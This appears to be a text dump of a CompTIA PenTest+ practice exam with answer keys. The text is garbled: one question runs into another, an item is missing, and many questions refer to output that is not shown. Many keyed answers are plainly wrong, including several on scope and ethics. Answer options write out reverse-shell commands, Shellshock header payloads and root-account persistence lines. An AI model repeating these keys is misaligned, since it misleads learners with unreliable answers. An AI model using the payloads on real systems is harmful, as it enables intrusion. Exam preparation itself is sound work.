
PT0-002-dg-re-les3ks.pdf



PT0-002 Exam
Exam: PT0-002
Title: CompTIA PenTest+
Product: 68 Q&A with explanations
Type:

QUESTION 1
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
A. chmod u+x script.sh
B. chmod u+e script.sh
C. chmod o+e script.sh
D. chmod o+x script.sh
Answer: A
Reference: https://newbedev.com/chmod-u-x-versus-chmod-x

QUESTION 2
A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
Which of the following actions is the tester MOST likely performing?
A. Redirecting Bash history to /dev/null
B. Making a copy of the user's Bash history for further enumeration
C. Covering tracks by clearing the Bash history
D. Making decoy files on the system to confuse incident responders
Answer: C
Reference: https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-coveryour-tracks-remain-undetected-0244768/

QUESTION 3
A compliance-based penetration test is primarily concerned with:
A. obtaining PII from the protected network.
B. bypassing protection on edge devices.
C. determining the efficacy of a specific set of security standards.
D. obtaining specific information from the protected network.
Answer: C

QUESTION 4
A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel. Which of the following would the tester MOST likely describe as a benefit of the framework?
A. Understanding the tactics of a security intrusion can help disrupt them.
B. Scripts that are part of the framework can be imported directly into SIEM tools.
C. The methodology can be used to estimate the cost of an incident better.
D. The framework is static and ensures stability of a security program over time.
Answer: A
Reference: https://attack.mitre.org/

QUESTION 5
Which of the following BEST describe the OWASP Top 10? (Choose two.)
A. The most critical risks of web applications
B. A list of all the risks of web applications
C. The risks defined in order of importance
D. A web-application security standard
E. A risk-governance and compliance framework
F. A checklist of Apache vulnerabilities
Answer: A, C
Reference: https://www.synopsys.com/glossary/what-is-owasp-top-10.html

QUESTION 6
A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:
Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
A. Edit the discovered file with one line of code for remote callback.
B. Download .pl files and look for usernames and passwords.
C. Edit the smb.conf file and upload it to the server.
D. Download the smb.conf file and look at configurations.
Answer: C

QUESTION 7
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the tester verify FIRST to assess this risk?
A. Whether sensitive client data is publicly accessible
B. Whether the connection between the cloud and the client is secure
C. Whether the client's employees are trained properly to use the platform
D. Whether the cloud applications were developed using a secure SDLC
Answer: A

QUESTION 8
A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?
A. nc 10.10.51.50 9891 < exploit
B. powershell -exec bypass -f \\10.10.51.50\9891
C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
D. wget 10.10.51.50:9891/exploit
Answer: D

QUESTION 9
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
Which of the following commands should the penetration tester run post-engagement?
A. grep -v apache ~/bash_history > ~/.bash_history
B. rm -rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM 'apache' /F
Answer: B

QUESTION 10
Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?
A. Executive summary of the penetration-testing methods used
B. Bill of materials including supplies, subcontracts, and costs incurred during assessment
C. Quantitative impact assessments given a successful software compromise
D. Code context for instances of unsafe typecasting operations
Answer: C

QUESTION 11
SIMULATION
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present. Remediate ONLY the highest vulnerability from either the certificate, source, or cookies. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer: See explanation below.
Explanation:
Step 1: Generate Certificate Signing Request
Step 2: Submit CSR to the CA
Step 3: Remove certificate from the server
Step 4: Install re-issued certificate on the server

QUESTION 12
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees. Which of the following tools can help the tester achieve this goal?
A. Metasploit
B. Hydra
C. SET
D. WPScan
Answer: A

QUESTION 13
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?
A. Unsupported operating systems
B. Susceptibility to DDoS attacks
C. Inability to network
D. The existence of default passwords
Answer: A

QUESTION 14
Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz.* on a Windows server that the tester compromised?
A. To remove hash-cracking registry entries
B. To remove the tester-created Mimikatz account
C. To remove tools from the server
D. To remove a reverse shell from the system
Answer: B

QUESTION 15
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?
A. nmap 192.168.1.1-5 -PU22-25,80
B. nmap 192.168.1.1-5 -PA22-25,80
C. nmap 192.168.1.1-5 -PS22-25,80
D. nmap 192.168.1.1-5 -Ss22-25,80
Answer: C

QUESTION 16
A penetration tester was brute forcing an internal web server and ran a command that produced the following output:
However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed. Which of the following is the MOST likely reason for the lack of output?
A. The HTTP port is not open on the firewall.
B. The tester did not run sudo before the command.
C. The web server is using HTTPS instead of HTTP.
D. This URI returned a server error.
Answer: A

QUESTION 17
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address. Which of the following MOST likely describes what happened?
A. The penetration tester was testing the wrong assets.
B. The planning process failed to ensure all teams were notified.
C. The client was not ready for the assessment to start.
D. The penetration tester had incorrect contact information.
Answer: B

QUESTION 18
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems. Which of the following is the penetration tester trying to accomplish?
A. Uncover potential criminal activity based on the evidence gathered.
B. Identify all the vulnerabilities in the environment.
C. Limit invasiveness based on scope.
D. Maintain confidentiality of the findings.
Answer: C

QUESTION 19
A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago. In which of the following places should the penetration tester look FIRST for the employees' numbers?
A. Web archive
B. GitHub
C. File metadata
D. Underground forums
Answer: A

QUESTION 20
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?
A. Run nmap with the -O, -p22, and -sC options set against the target.
B. Run nmap with the -sV and -p22 options set against the target.
C. Run nmap with the --script vulners option set against the target.
D. Run nmap with the -sA option set against the target.
Answer: D

QUESTION 21
A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability. Which of the following is the BEST way to ensure this is a true positive?
A. Run another scanner to compare.
B. Perform a manual test on the server.
C. Check the results on the scanner.
D. Look for the vulnerability online.
Answer: B

QUESTION 22
A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the HIGHEST likelihood of success?
A. Attempting to tailgate an employee who is going into the client's workplace
B. Dropping a malicious USB key with the company's logo in the parking lot
C. Using a brute-force attack against the external perimeter to gain a foothold
D. Performing spear phishing against employees by posing as senior management
Answer: C

QUESTION 23
A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router. Which of the following is MOST vulnerable to a brute-force attack?
A. WPS
B. WPA2-EAP
C. WPA-TKIP
D. WPA2-PSK
Answer: A
Reference: https://us-cert.cisa.gov/ncas/alerts/TA12-006A

QUESTION 24
A penetration tester writes the following script:
Which of the following objectives is the tester attempting to achieve?
A. Determine active hosts on the network.
B. Set the TTL of ping packets for stealth.
C. Fill the ARP table of the networked devices.
D. Scan the system on the most used ports.
Answer: A

QUESTION 25
A penetration tester ran the following commands on a Windows server:
Which of the following should the tester do AFTER delivering the final report?
A. Delete the scheduled batch job.
B. Close the reverse shell connection.
C. Downgrade the svsaccount permissions.
D. Remove the tester-created credentials.
Answer: D

QUESTION 26
A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective?
A. Socat
B. tcpdump
C. Scapy
D. dig
Answer: A

QUESTION 27
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test. Which of the following describes the scope of the assessment?
A. Partially known environment testing
B. Known environment testing
C. Unknown environment testing
D. Physical environment testing
Answer: C

QUESTION 28
The following line-numbered Python code snippet is being used in reconnaissance:
Which of the following line numbers from the script MOST likely contributed to the script triggering a 'probable port scan' alert in the organization's IDS?
A. Line 01
B. Line 02
C. Line 07
D. Line 08
E. Line 12
Answer: A

QUESTION 29
A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE?
A. Cost of the assessment
B. Report distribution
C. Testing restrictions
D. Liability
Answer: B

QUESTION 30
A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings. Which of the following is most important for the penetration tester to define FIRST?
A. Establish the format required by the client.
B. Establish the threshold of risk to escalate to the client immediately.
C. Establish the method of potential false positives.
D. Establish the preferred day of the week for reporting.
Answer: A

QUESTION 31
A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?
A. iam_enum_permissions
B. iam_prive_sc_scan
C. iam_backdoor_assume_role
D. iam_bruteforce_permissions
Answer: A

QUESTION 32
A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?
A. Halt the penetration test.
B. Contact law enforcement.
C. Deconflict with the penetration tester.
D. Assume the alert is from the penetration test.
Answer: B

QUESTION 33
A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet. Which of the following tools or techniques would BEST support additional reconnaissance?
A. Wardriving
B. Shodan
C. Recon-ng
D. Aircrack-ng
Answer: C

QUESTION 34
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team?
A. Multiple handshakes
B. IP addresses
C. Encrypted file transfers
D. User hashes sent over SMB
Answer: D

QUESTION 35
A penetration tester conducts an Nmap scan against a target and receives the following results:
Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?
A. Nessus
B. ProxyChains
C. OWASP ZAP
D. Empire
Answer: B
Reference: https://www.codeproject.com/Tips/634228/How-to-Use-Proxychains-Forwarding-Ports

QUESTION 36
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?
A. Reach out to the primary point of contact.
B. Try to take down the attackers.
C. Call law enforcement officials immediately.
D. Collect the proper evidence and add to the final report.
Answer: A

QUESTION 37
A penetration tester received a .pcap file to look for credentials to use in an engagement. Which of the following tools should the tester utilize to open and read the .pcap file?
A. Nmap
B. Wireshark
C. Metasploit
D. Netcat
Answer: B

QUESTION 38
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:
nmap -O -A -sS -p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?
A. A firewall or IPS blocked the scan.
B. The penetration tester used unsupported flags.
C. The edge network device was disconnected.
D. The scan returned ICMP echo replies.
Answer: A

QUESTION 39
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
- Have a full TCP connection
- Send a 'hello' payload
- Wait for a response
- Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?
A. Run nmap -Pn -sV --script vuln.
B. Employ an OpenVAS simple scan against the TCP port of the host.
C. Create a script in the Lua language and use it with NSE.
D. Perform a credentialed scan with Nessus.
Answer: C

QUESTION 40
Performing a penetration test against an environment with SCADA devices brings an additional safety risk because the:
A. devices produce more heat and consume more power.
B. devices are obsolete and are no longer available for replacement.
C. protocols are more difficult to understand.
D. devices may cause physical world effects.
Answer: C

QUESTION 41
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the following Nmap scan syntaxes would BEST accomplish this objective?
A. nmap -sT -vvv -O 192.168.1.2/24 -PO
B. nmap -sV 192.168.1.2/24 -PO
C. nmap -sA -v -O 192.168.1.2/24
D. nmap -sS -O 192.168.1.2/24 -T1
Answer: D
Reference: https://nmap.org/book/man-port-scanning-techniques.html

QUESTION 42
A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier. Which of the following is the BEST action for the penetration tester to take?
A. Utilize the tunnel as a means of pivoting to other internal devices.
B. Disregard the IP range, as it is out of scope.
C. Stop the assessment and inform the emergency contact.
D. Scan the IP range for additional systems to exploit.
Answer: D

QUESTION 43
A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing?
A. Phishing
B. Tailgating
C. Baiting
D. Shoulder surfing
Answer: C
Reference: https://phoenixnap.com/blog/what-is-social-engineering-types-of-threats

QUESTION 44
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position. Which of the following actions, if performed, would be ethical within the scope of the assessment?
A. Exploiting a configuration weakness in the SQL database
B. Intercepting outbound TLS traffic
C. Gaining access to hosts by injecting malware into the enterprise-wide update server
D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates
E. Establishing and maintaining persistence on the domain controller
Answer: B

QUESTION 45
A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the server?
A. Perform vertical privilege escalation.
B. Replay the captured traffic to the server to recreate the session.
C. Use John the Ripper to crack the password.
D. Utilize a pass-the-hash attack.
Answer: D

QUESTION 46
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?
A. NDA
B. MSA
C. SOW
D. MOU
Answer: C

QUESTION 47
A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following:
Which of the following tools would be BEST for the penetration tester to use to explore this site further?
A. Burp Suite
B. DirBuster
C. WPScan
D. OWASP ZAP
Answer: A

QUESTION 48
DRAG DROP
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
INSTRUCTIONS
Analyze the code segments to determine which sections are needed to complete a port scanning script. Drag the appropriate elements into the correct locations to complete the script. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Select and Place:
Correct Answer:

QUESTION 49
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format:
Which of the following would be the best action for the tester to take NEXT with this information?
A. Create a custom password dictionary as preparation for password spray testing.
B. Recommend using a password manager/vault instead of text files to store passwords securely.
C. Recommend configuring password complexity rules in all the systems and applications.
D. Document the unprotected file repository as a finding in the penetration-testing report.
Answer: D

QUESTION 50
When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?
A. &1', 'Accept': 'text/html,application/xhtml+xml,application/xml'}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
A. exploit = {'User-Agent': '() { ignored;};/bin/bash -i id;whoami', 'Accept': 'text/html,application/xhtml+xml,application/xml'}
B. exploit = {'User-Agent': '() { ignored;};/bin/bash -i>& find / -perm -4000', 'Accept': 'text/html,application/xhtml+xml,application/xml'}
C. exploit = {'User-Agent': '() { ignored;};/bin/sh -i ps -ef'0>&1', 'Accept': 'text/html,application/xhtml+xml,application/xml'}
D. exploit = {'User-Agent': '() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80'0>&1''Accept': 'text/html,application/xhtml+xml,application/xml'}
Answer: D

QUESTION 53
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)
A. Wireshark
B. Nessus
C. Retina
D. Burp Suite
E. Shodan
F. Nikto
Answer: A, E
Reference: https://resources.infosecinstitute.com/topic/top-10-network-recon-tools/

QUESTION 54
A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection?
A. nmap -P0 -T0 -sS 192.168.1.10
B. nmap -sA -sV --host-timeout 60 192.168.1.10
C. nmap -f --badsum 192.168.1.10
D. nmap -A -n 192.168.1.10
Answer: A
Reference: https://www.oreilly.com/library/view/network-security-assessment/9780596510305/ch04.html

QUESTION 55
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?
A. Send deauthentication frames to the stations.
B. Perform jamming on all 2.4GHz and 5GHz channels.
C. Set the malicious AP to broadcast within dynamic frequency selection channels.
D. Modify the malicious AP configuration to not use a preshared key.
Answer: C

QUESTION 56
SIMULATION
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Part 1
Part 2
Answer: See explanation below.
Explanation:
Part 1 - Enter command: nmap 192.168.2.2 -sV -O
Part 2 - Weak SMB file permissions

QUESTION 57
Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?
A. S/MIME
B. FTPS
C. DNSSEC
D. AS2
Answer: A

QUESTION 58
A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables. Which of the following should be included as a recommendation in the remediation report?
A. Stronger algorithmic requirements
B. Access controls on the server
C. Encryption on the user passwords
D. A patch management program
Answer: C

QUESTION 59
A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987. Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?
A. SQLmap
B. Nessus
C. Nikto
D. DirBuster
Answer: B

QUESTION 60
A penetration tester is attempting to discover live hosts on a subnet quickly. Which of the following commands will perform a ping scan?
A. nmap -sn 10.12.1.0/24
B. nmap -sV -A 10.12.1.0/24
C. nmap -Pn 10.12.1.0/24
D. nmap -sT -p- 10.12.1.0/24
Answer: A
Reference: https://www.tecmint.com/find-live-hosts-ip-addresses-on-linux-network/

QUESTION 61
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?
A. Shodan
B. Nmap
C. WebScarab-NG
D. Nessus
Answer: B

QUESTION 62
Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?
A. Whether the cloud service provider allows the penetration tester to test the environment
B. Whether the specific cloud services are being used by the application
C. The geographical location where the cloud services are running
D. Whether the country where the cloud service is based has any impeding laws
Answer: C

QUESTION 63
HOTSPOT
You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTION
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:
Correct Answer:

QUESTION 64
A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?
A. John the Ripper
B. Hydra
C. Mimikatz
D. Cain and Abel
Answer: A

QUESTION 65
A penetration tester obtained the following results after scanning a web server using the dirb utility:
Which of the following elements is MOST likely to contain useful information for the penetration tester?
A. index.html
B. about
C. info
D. home.html
Answer: B

QUESTION 66
A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal?
A. Wireshark
B. Aircrack-ng
C. Kismet
D. Wifite
Answer: B
Reference: https://null-byte.wonderhowto.com/how-to/hack-wi-fi-stealing-wi-fi-passwords-with-evil-twin-attack-0183880/

QUESTION 67
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?
A. schtasks /create /sc /ONSTART /tr C:\Temp|WindowsUpdate.exe
B. wmic startup get caption,command
C. (crontab -l; echo '@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash') | crontab 2>/dev/null
D. sudo useradd -ou 0 -g 0 user
Answer: B

QUESTION 68
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
A. PLCs will not act upon commands injected over the network.
B. Supervisors and controllers are on a separate virtual network by default.
C. Controllers will not validate the origin of commands.
D. Supervisory systems will detect a malicious injection of code/commands.
Answer: C
